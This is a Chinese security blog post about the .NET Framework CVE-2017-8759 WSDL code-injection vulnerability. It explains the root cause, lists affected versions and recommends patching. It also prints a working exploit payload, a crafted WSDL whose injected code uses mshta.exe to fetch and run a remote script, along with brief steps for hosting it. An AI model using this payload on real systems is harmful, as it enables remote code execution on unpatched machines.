.NET最新漏洞CVE-2017-8759 POC已公布,大规模攻击即将来临

释放双眼,带上耳机,听听看~!

图  世界范围内感染FinSpy 图(即漏洞利用导致下载的间谍程序)

前天微软刚补好的漏洞,昨天fireeye发文,然后各平台开始写报告

然而昨天在ISC大会,今天就看见poc被公布了

https://github.com/vysec/CVE-2017-8759

<definitions
xmlns=”http://schemas.xmlsoap.org/wsdl/”
xmlns:soap=”http://schemas.xmlsoap.org/wsdl/soap/”
xmlns:suds=”http://www.w3.org/2000/wsdl/suds”
xmlns:tns=”http://schemas.microsoft.com/clr/ns/System”
xmlns:ns0=”http://schemas.microsoft.com/clr/nsassem/Logo/Logo”>
<portType name=”PortType”/>
<binding name=”Binding” type=”tns:PortType”>
<soap:binding style=”rpc” transport=”http://schemas.xmlsoap.org/soap/http”/>
<suds:class type=”ns0:Image” rootType=”MarshalByRefObject”></suds:class>
</binding>
<service name=”Service”>
<port name=”Port” binding=”tns:Binding”>
<soap:address location=”https://example.com?C:\Windows\System32\mshta.exe?https://example.com/cmd.jpg”/>
<soap:address location=”;
if (System.AppDomain.CurrentDomain.GetData(_url.Split(‘?’)[0]) == null) {
System.Diagnostics.Process.Start(_url.Split(‘?’)[1], _url.Split(‘?’)[2]);
System.AppDomain.CurrentDomain.SetData(_url.Split(‘?’)[0], true);
} //”/>
</port>
</service>
</definitions>

把上面的报文放在服务器,样本请求该服务器,然后本地再加载dll就好了

本地放上那个github上面的bin文件

这个漏洞个人觉得很厉害,.NET框架每台机子基本都装着,内网的机子都不能更新的情况下,感觉目前网上居然对这个事情还觉得不是很严重的样子。。

外网已经有一大堆人在复现,上面是复现视频

可以看出多出来了两个文件,并且被执行

原理就是黑客构造一个服务器,然后样本访问该服务器会返回xml

然后本地的.NET服务通过解析这个xml会触发漏洞,该漏洞是由于.NET当中有个代码文件对换形符没有做过过滤,从而导致可以用注释的方式把

下面为漏洞起因代码

在.net库中的SOAP WSDL 解析模块IsValidUrl函数没有正确处理包含回车换行符的情况,导致调用者函数PrintClientProxy存在代码注入执行漏洞。

WSDL通过 PrintClientProxy函数去解析文件。当解析文件中包含多个地址时,会将后面的地址注释掉。然而IsValidUrl函数在验证URL时,并没有对换行符判断处理,导致后面可以插入任意代码。

以下为解析后生成的代码。因为其中包含换行,导致后面的代码没有注释成功。

最后通过csc.exe编译以上代码,在同目录下生成一个dll。之后Office会调用LoadLibrary加载该dll并执行。dll的功能是通过mshta.exe去执行链接指向的hta脚本文件。

利用成功图

影响范围也是巨大的

Microsoft .NET Framework 4.6.2 

Microsoft .NET Framework 4.6.1 

Microsoft .NET Framework 3.5.1 

Microsoft .NET Framework 4.7

Microsoft .NET Framework 4.6

Microsoft .NET Framework 4.5.2

Microsoft .NET Framework 3.5

Microsoft .NET Framework 2.0 SP2

更新系统,微软已经有补丁了的

走过路过给个关注,谢谢支持~

本文源自微信公众号:黑鸟

人已赞赏
安全工具

NSA计划3月初发布免费的逆向工具(代码开源)+RSA大会部分展示

2019-10-16 10:34:47

安全工具

针对叙利亚进行攻击的APT组织---黄金鼠最新活动分析

2019-10-16 10:34:53

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索